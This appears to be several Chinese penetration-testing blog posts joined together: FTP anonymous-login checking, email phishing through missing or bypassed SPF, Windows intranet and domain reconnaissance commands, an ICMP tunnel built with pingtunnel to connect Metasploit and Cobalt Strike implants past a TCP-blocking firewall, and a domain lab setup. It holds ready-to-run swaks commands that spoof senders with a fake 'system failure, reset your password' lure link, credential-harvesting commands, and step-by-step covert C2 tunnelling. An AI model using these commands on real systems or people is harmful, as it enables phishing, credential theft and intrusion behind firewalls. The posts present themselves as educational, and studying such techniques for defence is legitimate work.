ftp匿名登录 FTP协议-匿名用户登录前言日常大家可能接触web漏洞比较多而对其他端口及协议不那么了解，其实其他协议漏洞在渗透中也同样重要只是平时可能接触得不多。本文将介绍FTP协议、FTP匿名用户登录及其具体流程分析和自动化利用demo。FTP简介FTP是File Transfer Protocol（文件传输协议）的简称，用于internet上的控制文件的双向传输。很多人以为FTP是一个服务，实际上FTP 是一个协议而不是一个服务，应用到FTP协议的服务有很多，常用的就是vsftpd。FTP有三种用户模式： 匿名用户模式： 允许任何人无需提供用户名和密码即可登录 FTP 服务器。 通常对访问权限有严格限制，只能访问特定的公共目录，并且可能无法进行上传、删除等操作。 本地用户模式： 使用服务器操作系统中的本地用户账号和密码进行登录。 登录后，用户的权限与在本地操作系统中的权限相同。 比如，服务器上有个用户名为“user1”，其在操作系统中具有特定的文件和目录权限，那么在通过 FTP 以“user1”登录时，将拥有相同的权限。 虚拟用户模式： 这并非真正的操作系统用户，而是 FTP 服务器自定义的用户。 具有特定的权限配置，可根据需求灵活设置权限，实现更精细的访问控制。 常用于需要为 FTP 服务创建特殊权限用户，而又不想直接使用本地系统用户的情况。 FTP协议占用情况：21端口:命令控制，用于接收客户端执行的FTP命令。20端口:数据传输，用于上传、下载文件数据。、FTP服务搭建-vsftpdvsftpd默认以匿名用户访问，不修改配置文件的话本身就存在匿名用户登录漏洞。vsftpd安装yum -y install vsftpd服务启动systemctl vsftpd start防火墙规则放行firewall-cmd --zone=public --add-service=ftp --permanent firewall-cmd --zone=public --add-port=21/tcp --permanent复现分析进行连接ftp 192.168.174.128输入用户名 anonymous和ftp都行经过测试发现密码置为空或者是随意输入都可成功登录抓包分析首先进行TCP三次握手建立连接建立连接后服务端向客户端发送包，表示服务已为新连接的用户就绪以及一些服务信息客户端发送包表示表示服务器需要切换到UTF8字符集进行工作服务端再向客户端回包表示表示命令执行成功且已在工作再UTF8模式下接下来就是整个登录的流程，包括指定用户、输入密码和登录成功指定登录用户提示输入密码输入密码提示登录成功脚本测试可以使用python的ftplib库模拟FTP协议登陆的行为来进行自动化测试简单demo# -*- coding:utf-8 -*- """ @Created on : 2024/8/1 16:28 @Auther: c @Des: """ import ftplib from loguru import logger def anonymous_login(ip): try: ftp = ftplib.FTP(ip) logger.info("尝试匿名用户登录" + ip) ftp.login() except ftplib.all_errors as e: logger.info(f"匿名用户利用失败: {e}") else: logger.info("存在匿名用户" + ip) if __name__ == '__main__': anonymous_login('192.168.174.128')我们可以具体跟进看到login函数默认的用户为anonymous密码为anonymous@确实是登录成功了修复措施vsftpd下禁用匿名用户登录需修改配置文件/etc/vsftpd/vsftpd.conf，将anonymous_enable=YES修改为anonymous_enable=NO，再重新启动服务。再次用脚本测试可以看到登陆失败在wireshark中同样也是总结针对端口协议自动化探测及利用的脚本编写在此只做了简单demo示例。如果想更进一步，可以对端口进行遍历或指定探测，与特定服务返回数据包中固定字段进行匹配识别出协议再打对应协议漏洞poc。

SPF机制进行邮件钓鱼 你还敢随便点陌生邮件链接吗，浅谈黑客是如何利用SPF机制进行邮件钓鱼的SPF介绍spf是一种用于防止电子邮件伪造得技术，旨在确保只有授权的发送者才能适用特定的域名发送电子邮件，它也是邮件系统的一种安全机制，它的内容被写入DNS的TXT类型记录中。通过SPF记录，域名所有者可以指定哪些IP地址或服务器被授权代表该域名发送电子邮件。 防止伪造邮件地址：SPF通过验证发件人的IP地址是否被包含在SPF记录中，来防止他人伪造你的邮件地址发送垃圾邮件或进行网络钓鱼攻击。 提升邮件可信度：对于通过了SPF验证的邮件，接收邮件的服务器会将其视为更可信的邮件，从而提高邮件的送达率和打开率。 减少垃圾邮件：通过SPF验证，可以有效地过滤掉大量伪造邮件地址的垃圾邮件，减轻邮件服务器的负担。 判断是否使用了spfWindows： 输入nslookup -type=txt 域名命令，其中“域名”是你想要查询SPF记录的域名。例如，如果你的邮件地址是example@test.com，那么你应该查询的域名就是test.com。 执行命令后，命令提示符会返回该域名的TXT记录，其中就包含了SPF记录（如果有的话）。SPF记录通常以v=spf1开头。 Linux：dig -t txt 域名在线spf检查，工具示例https://powerdmarc.com/zh/spf-record-lookup/机制（Mechanisms）可以看到之前的图片的v=xxxx include:xxx ，这些都是SPF记录通过一系列机制来指定哪些邮件服务器或IP地址被授权发送邮件的机制。以下是一些常用的机制： include 用途：允许一个SPF记录包含（引用）另一个域名的SPF记录。 示例：include:spf.example.com a 用途：根据域名的A记录（IPv4地址）来验证发件人IP地址。 示例：a 或 a:example.com mx 用途：根据域名的MX记录来验证发件人IP地址。MX记录通常指向接收邮件的服务器。 示例：mx 或 mx:example.com ip4 和ip6 用途：直接指定IPv4或IPv6地址段，用于验证发件人IP地址。 示例：ip4:192.0.2.0/24 或 ip6:2001:db8::/32 ptr 用途：较少使用，因为它依赖于反向DNS查找，这可能不够可靠。 exist 用途：验证指定的域名是否存在。这通常与其他机制结合使用。 修饰符（Modifiers）SPF记录还可以包含修饰符，用于改变SPF检查的结果处理方式： +（pass）：表示SPF检查通过。 -（fail）：表示SPF检查失败。 ~（softfail）：表示“软失败”，即SPF检查没有明确通过，但也没有完全失败。 ?（neutral）：表示SPF记录对该IP地址没有明确的允许或拒绝立场。 终止符（all） 用途：all 机制用于终止SPF记录，并指定默认的处理方式。 示例：-all 表示如果前面的机制都没有匹配，则视为SPF检查失败；~all 表示软失败；?all 表示中立。 示例：v=spf1 mx a:mail.example.com ip4:192.0.2.1/32 include:spf.anotherservice.com ~allSPF记录指定了多种机制和修饰符，包括使用MX记录、指定A记录、直接指定IPv4地址段、包含另一个域名的SPF记录，并以软失败作为默认处理方式。邮件钓鱼演练无SPF攻击利用方式这里推荐一个没有spf的邮箱网站便于演练https://www.linshi-email.com/nslookup -type=txt iubridge.com，对邮件系统的站点此时也没有使用nslookup -type=txt linshi-email.com对站点进行检测，也没有spf验证使用kali的swaks进行伪造发送邮件 ，由于该临时邮箱没有使用spf，所以可以直接使用该邮箱发送邮件命令举例：swaks --to 10xxxxxxx9@qq.com（需要钓鱼的邮箱） --from wangdun@iubridge.com（临时邮件） --ehlo qq.com --body '由于系统故障，导致密 码丢失，请 点击如下链接登录平台修改密码。https://xiaoyus.cc' --header "Subject: 系统故障"其中--to //收件人邮箱地址--from test@qq.com //发件人邮箱；--ehlo qq.com //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证，比如目标是qq邮箱，那么就是qq.com，目标是163那么就是163.com--body "http://www.baidu.com" //引号中的内容即为邮件正文；--header "Subject:hello" //邮件头信息，subject为邮件标题--data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送发送成功qq邮箱会提醒这个身份不安全（也可以绕过），此时你点击了这个链接，你就危险了163网易邮箱大师没有安全提示，各个厂商算法不同吧Tips：添加附件--attach XX.docx有SPF（绕过）案例，使用xxx2333@qq.com （临时qq邮箱）向对目标xxxxxx9999@163.com进行钓鱼swaks --to xxxxxx9999@163.com --from xxx2333@qq.com --ehlo qq.com --body '由于系统故障，导致密 码丢失，请点击如下链接登录平台修改密码。https://xiaoyus.cc' --header "Subject: 系统故障"--au : 使用这个参数指定你发送邮件的用户名（一般就是发送者的邮箱账号）--ap : 你的授权码此时你就需要把你的钓鱼邮箱开启POP3/SMTP服务，如下图注意开启这些服务之后会出现一个授权码，用到-ap参数，此时就可以进行发送了进行测试，payload如下：swaks -from xxxxxxx@163.com --body 'this is a hacker email!' --to xxxxxx@qq.com --server smtp.163.com -p 25 -ap 你的密码/授权码 -au yxy350488@163.com发送成功，查看该邮件可见如果你泄露了自己的SMTP授权码，那么黑客就可以用这个授权码模拟你的qq/163/腾讯邮箱，这些有spf的官方邮箱对你进行邮件钓鱼，如果你点了这个链接，那么你就危险了下面是常见的邮件服务器 发信邮箱 服务器地址 qq / foxmail smtp.qq.com:465 网易 POP3服务器: pop.126.comSMTP服务器: smtp.126.com:465IMAP服务器: imap.126.com 新浪 pop.sina.comsmtp.sina.comimap.sina.com 电信189 smtp.189.cn:465 电信21cn smtp.21cn.com:465 企业应该如何防护？除了使用SPF等技术来防止伪造邮件外，还可以采取以下措施来防御钓鱼邮件： 用户教育：教育员工识别钓鱼邮件的特征，如拼写错误、紧急请求、来自未知发件人的邮件等。 邮件网关安全：使用先进的邮件网关安全解决方案来过滤垃圾邮件和钓鱼邮件。 多因素身份验证：在关键账户上启用多因素身份验证，即使攻击者获得了用户的密码，他们仍然需要第二个验证因素才能访问账户。 安全软件：在终端设备上安装反病毒和反间谍软件，以防止恶意软件通过钓鱼邮件传播。 个人该如何防护？个人网络安全防护需提升安全意识，采用强密码并定期更换，保持系统及软件更新，警惕电子邮件风险，利用VPN保护公共网络下的数据传输，确保移动设备安全，定期备份并加密重要数据，同时重视物理安全，锁好设备并锁屏以防未授权访问。免责声明：本文所提供的信息、技术示例、操作指导及任何相关内容均旨在教育和分享目的，并不构成专业法律、技术或安全建议。本教程仅供钓鱼演练，请误对真实邮箱进行钓鱼，所造成的任何后果和法律责任，自行承担，与作者无关网安学习不迷路，人海茫茫来相见

【内网渗透】免工具，内网和域内信息收集的40种方式总结 【内网渗透】免工具，内网和域内信息收集的40种方式总结前言本文主要演示了【系统信息收集】【浏览器信息收集】和【域内信息收集】，因为上一篇已经讲过了基本的信息收集方式：这篇新增了域内信息收集和浏览器信息收集，并且在上一篇文章的基础下，新增了好几种内网信息收集的方式，这里先介绍域内信息收集域内信息查看当前登录域显示和更改可配置的工作站服务参数。net config workstation域列表显示域列表、计算机列表或指定计算机的共享资源列表。net view如果出现如下错误那么就关闭防火墙检查服务Computer Browser是否开启域列表net domain /domain域内用户组查看域内所有用户组列表net group /domain域内用户查看域内所有用户net user /domain域内详细信息wmic useraccount get /all存在的用户查看存在的用户dsquery user本地管理员组net localgroup administrators /domain域内管理员组net group "domain admins" /domain net group "enterprise admins" /domain net group "schema admins" /domain域内时间net time /domain域内计算机域内所有成员的计算机列表net group "domain computers" /domain域密码信息net accounts /domain域信任列表域信任列表：主要用于验证对方证书是否可信。当一个域内的用户在检验另一个域内用户身份时，会检查对方证书的颁发CA是否在信任列表中，从而判断是否能信任对方用户的身份。net accounts /domain域控制器名称域内控制器名称nltest /DCLIST:域名主机名域控制器主机名nslookup -type=SRV _ldap._tcp真实环境中，一般存在两台或两台以上的域控制器，其目的是：一旦主域控制器发生故障， 备用的域控制器可以使域内服务验证正常进行。组域控制器组主主控制器浏览器信息chrome C:Users$usernameAppDataLocalGoogleChromeUser DataDefaultHistory firefox C:UsersUndefined control sequence AppDataname.defaultplaces.sqlite IE reg query "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerTypedURLs" 或C:Users$userAppDataLocalMicrosoftWindowsHistory edge, v79+: C:Users$userAppDataLocalMicrosoftEdgeUser DataDefaultHistory v44+ C:Users$userAppDataLocalMicrosoftWindowsWebCacheWebCacheV01.dat系统信息当前用户信息查看当前用户信息，RID，组信息，特权信息whoami /all系统信息systeminfo网络及端口状态netstat -an这里，-a 表示显示所有连接和监听端口，-n 表示以数字形式显示地址和端口号。LISTENING：表示监听中，这个端口正在开放，可以提供服务SYN_SENT：客户端已经发送连接请求（SYN），并正在等待服务器的确认（SYN-ACK报文）。这是TCP三次握手过程中的一个状态。CLOSED：连接已关闭，不再存在。TIME_WAIT：连接已关闭，但TCP协议规定在这段时间内（通常是2倍的最大报文存活时间，即2MSL）不能立即使用该连接相同的四元组（源IP、源端口、目标IP、目标端口）建立新的连接，以防止旧连接的残留数据干扰新连接。【MSL，报文最大生存时间可能是30秒、1分钟或2分钟，取决于操作系统】ESTABLISHED：连接已成功建立，数据可以在客户端和服务器之间双向传输。比如HTTP/HTTPS，FTP，SMTP，SSH，MYSQL，RDP（windows远程桌面服务）等当前主机名称hostname当前操作系统wmic OS这么不好看？就使用get命令对每一列进行筛选，赛选常用的信息wmic OS get Caption,CSDVersion,OSArchitecture,Version安装的应用程序wmic product get name,version在线用户quser网络配置ipconfig /all查看进程tasklist /vIP地址DNS服务器，本地IP，网关地址ipconfig /all是否可ping通dns地址主机开机时间继上一篇补充一些net statistics workstation如果拒绝访问的话就使用管理员打开cmd有执行结果的话应该是这样的路由route printARP命令的作用主要是显示本地ARP（地址解析协议）缓存表。arp -a # 计算机中存储的已解析IP地址及其对应的MAC地址。快速查看计算机与其他设备之间的网络连接情况。防火墙配置netsh firewall show config远程连接如果3389端口开启，那么极有可能开启了远程连接服务netstat -ano | findstr 3389远程桌面连接历史记录有的话就有，可以把凭证取下来进行本地解密、没有的话会显示无cmdkey /list本机用户net user某用户的X信息net user 用户名往期推荐【JS逆向】某大型音乐平台JS逆向分析【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析最新可用，bp+charles小程序抓包教程DocCMS 网站存在SQL注入漏洞PwnLab: init-文件包含、shell反弹、提权--靶机渗透思路讲解【附靶机链接】

【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF，CS 会当凌绝顶，一览众山小前言渗透测试中，如果攻击者使用各类上层隧道(例如：HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了，常常会通过ping命令访问远程计算机，尝试建立ICMP隧道，将TCP/UDP数据封装到ICMP的ping数据包中，本文主要讲解了【靶机能上TCP和不能上TCP的区别】【利用pingtunnel搭建ICMP隧道，实现靶机上线MSF/CS的过程】，以及它的原理解释，如果哪里说错了，还请师傅们指出，谢谢您。靶机能上TCP首先我们使用msfvenom生成widows木马 设置好payload开启监听运行即可上线正常情况下木马使用的是TCP协议，靶机能上网，那么靶机不能上网，阻止了防火墙出网呢？也不能走TCP访问攻击机器呢？这个时候MSF就不能通过TCP协议上线，下面将演示MSF通过ICMP协议上线靶机阻止TCP连接环境搭建检查网络通信，可以ping通百度也可以正常访问百度靶机启用防火墙kali攻击机器ping（访问）靶机就不通了靶机阻止防火墙所有出站TCP规则，也就是我们靶机访问不了外网，浏览器打不开百度了设置为阻止全部勾选这个时候可以ping通百度，但是tcp无法访问（浏览器访问网站这个操作，就是走的TCP协议），而ping使用的是icmp协议，所以可以ping通百度，也可以ping（访问）通我们的攻击机没上线成功的过程就不演示了，作用不大注：木马走的都是tcp协议，此时我们禁用了TCP协议，msf就无法上线，该怎么绕过呢？工具使用这时候我们就需要一个工具MSF隧道搭建工具pingtunnel工具链接链接：https://pan.baidu.com/s/1LsLiszJCdAoZs0I4PfXeWg?pwd=1212提取码：1212PingTunnel是一款常用的ICMP隧道工具，可以跨平台使用，为了避免隧道被滥用，还可以为隧道设置密码。pingtunnel工具是基于网络层面ICMP协议的内网穿透工具。在本次教程中它的主要作用，如图这张图主要介绍了两个部分1、靶机使用容器，将tcp数据包打包为icmp数据包2、msf接收的时候，将icmp数据包还原成tcp数据包实现过程下载好工具后把他移到kali中kali启用PingTunnel服务器此时kali生成的木马需要是127.0.0.1，端口为靶机监听的地址（原理待会解释）PingTunnel把木马的TCP数据包封装为ICMP数据包，这时候就可以通过ICMP协议发送到攻击机服务器工具使用教程如下命令解释pingtunnel -type client -l 127.0.0.1:8888 -s 192.168.209.151 -t 192.168.209.151:9999 -tcp 1运行查看kali服务端，icmp协议已成功收到靶机的访问请求MSF设置监听端口9999，本地地址为0.0.0.0全局地址当PingTunnel服务器接收到靶机的ICMP数据包的时候，PingTunnel就会将ICMP数据包拆解为TCP数据包，这时候MSF就会接收到此”TCP请求“，即可成功利用icmp隧道成功上线MSF执行命令原理解释再来看这张图结合上面的结构图和这个案例即可得到原理，攻击机器生成木马，并传到靶机上，靶机运行木马在本地的8888端口，而PingTunnel在靶机上将这个端口的TCP流量打包，转发到攻击机刚刚开启的PingTunnel服务器，PingTunnel服务器接收到这个icmp请求之后，将这个ICMP包进行拆解转化为TCP协议，最后将这个TCP协议转发到攻击机器（kali）MSF监听的端口，此时就可以完成MSF上线CS通过ICMP上线CS也是一样的原理，主机cs生成木马，送到靶机，添加两个监听器，靶机自己监听地址kali接受shell地址如下生成payload，选择靶机的监听地址放入靶机运行木马之后，再运行pingtunnel，转发到攻击机的服务器pingtunnel -type client -l 127.0.0.1:8888 -s 192.168.209.151 -t 192.168.209.151:9999 -tcp 1成功上线，如果没上线成功，这个红色的框一定要检查是否正确whoami总结本文详细讲解了在内网渗透中，当常规的网络通信手段（如TCP协议）受阻时，如何利用ICMP隧道技术实现MSF和CS的上线。通过搭建PingTunnel服务器，将TCP数据包封装在ICMP数据包中，利用ICMP协议进行数据传输，从而绕过网络限制。文章还详细解释了ICMP隧道的工作原理，并通过实际案例展示了其应用过程。感今怀昔最新可用，bp+charles小程序抓包教程DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【kali笔记】一款强大的Web目录扫描工具DIRB使用指南PwnLab: init-文件包含、shell反弹、提权--靶机渗透思路讲解【附靶机链接】PHP反序列化漏洞从入门到深入8k图文介绍，以及phar伪协议的利用

什么是域？如何搭建一个简单的域环境？ 什么是域？如何搭建？域域是计算机网络中的一个逻辑组织单元，具有安全边界，实现资源的集中管理和共享。它通常分为，单域 ，多域，父域，子域 ，域树（tree）， 域森林（forest），DNS域名服务器。单域和多域单域指网络中所有计算机和用户隶属于同一域，便于集中管理；多域则将网络划分为多个独立域，每个域有各自的管理员、安全策略和资源，提高灵活性和安全性。父域和子域父域和子域是计算机网络和域名系统（DNS）中的概念，一句话概括即：父域是包含其他域（子域）的顶级域，而子域则是父域下进一步划分的独立部分，两者通过层次结构组织起来，共同构成复杂的网络命名体系。emmmm，该图仅供参考，哪有不对，还请指出，谢谢各位师傅域树（tree） 域森林（forest）域森林指若干个域树通过建立信任关系组成的集合。可以通过域树之间建立的信任关系来管理和使用整个森林中的资源，从而又保持了原有域自身原有的特性。这里域树abc.com与域树abc.net之间通过建立信任关系来构成域森林。emmmm，该图仅供参考，哪有不对，还请指出，谢谢各位师傅如何搭建？服务器管理员（administrator）的密码不能太简单，建议用大小写和字符混合的，否则影响先决条件检查的结果。这里使用的操作系统是Windows server 2012域控服务器需要修改静态IP地址，方便查找域控服务器的位置设置自己为DNS服务器，网关可设可不设修改计算机名称为DC（域控服务器）重启！添加角色和功能选择指定选项，一路下一步设置为如果需要，自动重启服务器不要带点关闭，先点将此服务器升级为域控服务器，之后再关闭配置根域名（需要符合域名配置规则）选择你得域控服务器版本，我的是windows server 2012添加还原DSRM密码这个域名就是刚刚填的根域名称的大写确保所有的先决条件检查通过，就可以开始安装了重启之后就会发现计算机全名便成了域控服务器如果ping不了的话，就检查静态dns是否正确关闭防火墙添加一个域控账号添加域用户新建一个域用户，用于第二台机器win2008登录域控服务器设置好账号名称设置密码如果出现着这种情况，出网了，也就是ping了这个域名下的公网服务器地址，而不是域控服务器的地址。那么就去改hosts，把这个域名指向域控服务器的DNS此时就可以看到ip地址变为了域控服务器的DNS地址另一台修改DNS为域控服务器，我这里是2008此时即可ping通域控服务器加入域输入域管账号密码，也就是win2012开启域控服务器时的用户和密码加入域即可重启这个时候域控服务器就可以看看到这个计算机使用我们刚刚创建的zs用户登录域使用域登录账号格式为合起来就是REDTEAMzs，密码为你添加的域用户密码，登录成功后会发现重启不了改dns，也需要域管账号密码，这时候就体现了域的作用了域超管账号administrator在任何域内主机上都可以登录，如果需要添加一个域管理员，在任何机器上都能登录，那么就在Domain Admins中添加管理员账号一个简单的工作组权限案例登录普通用户windows中超级管理员的SID中RID是500，就像linux的root账户UID为0如果发现密码不符合要求打开我们的本地安全策略，把密码复杂性禁用就好换一个稍微复杂的密码，添加一个管理员，分配到超级管理员组登录新加的test用户此时SID的RID为1001，而不是500Tips : 在Windows系统中，指派给用户、计算机和组的RID通常从1000开始。因此，当SID中的RID大于1000时，意味着这个SID代表的是在系统中后创建的用户、组或计算机账户。主管是降权后的超级管理员必须要过UAC验证过了UAC就可以添加用户，为了进一步演示，再添加一个test1用户切换用户后，执行如图命令，SID中的RID为1002添加的普通用户过不了UAC，需要管理员的账号密码回首往昔【渗透测试】12种rbash逃逸方式总结最新可用，bp+charles小程序抓包教程DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析DocCMS 网站存在SQL注入漏洞